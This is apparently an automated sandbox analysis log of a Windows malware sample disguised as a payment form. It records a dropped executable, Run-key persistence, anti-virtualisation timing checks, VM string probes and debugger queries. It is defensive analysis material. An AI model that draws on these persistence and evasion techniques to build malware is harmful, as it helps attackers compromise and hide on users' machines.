          Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88AAC push 0040FD9Ch; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C7C2AC push eax; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88AA5 push 0040FD9Ch; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88A53 push 0040FD65h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88A54 push 0040FD65h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C7F258 push 00406548h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C7F21E push 00406510h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C7F220 push 00406510h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8D230 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8EBDC push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8C3FF push 00413707h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8DB48 push 00414E38h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8DB46 push 00414E38h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C888DC push 0040FC48h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8E8E4 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C858FE push 0040CBF0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C85858 push 0040CB8Bh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C85856 push 0040CB8Bh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88864 push 0040FB9Eh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C889F0 push 0040FCE0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C88986 push 0040FCE0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8F168 push 004164BEh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C85900 push 0040CBF0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C85938 push 0040CC28h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C86138 push 0040D428h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C856D8 push 0040CB18h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8BE72 push 004131E3h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8BE74 push 004131E3h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8BFCF push 004132D7h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C8BFD0 push 004132D7h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 1_3_02C7F7F8 push 00406AE8h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | File created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Fdhlajk
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\logagent.exe | RDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exe | RDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mshta.exe | RDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mshta.exe | RDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000000B885E4 second address: 0000000000B885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\secinit.exe | RDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000000B8897E second address: 0000000000B88984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\secinit.exe | RDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000029485E4 second address: 00000000029485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 000000000294897E second address: 0000000002948984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exe | Code function: 4_2_049A6DE6 rdtsc
          Source: C:\Windows\explorer.exe TID: 6064 | Thread sleep time: -95000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.413920977.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000008.00000000.402875441.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bk?
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B&9]
          Source: explorer.exe, 00000008.00000000.402875441.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.414955487.0000000008540000.00000004.00000001.sdmp | Binary or memory string: Prod_VMware_SATA-
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000008.00000000.413126588.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.413126588.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000008.00000000.413920977.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\logagent.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\logagent.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mshta.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\secinit.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\logagent.exe | Code function: 4_2_049A6DE6 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8F0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8F120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8E480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04987D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1FE3F mov eax, dword ptr fs:[00000030h]
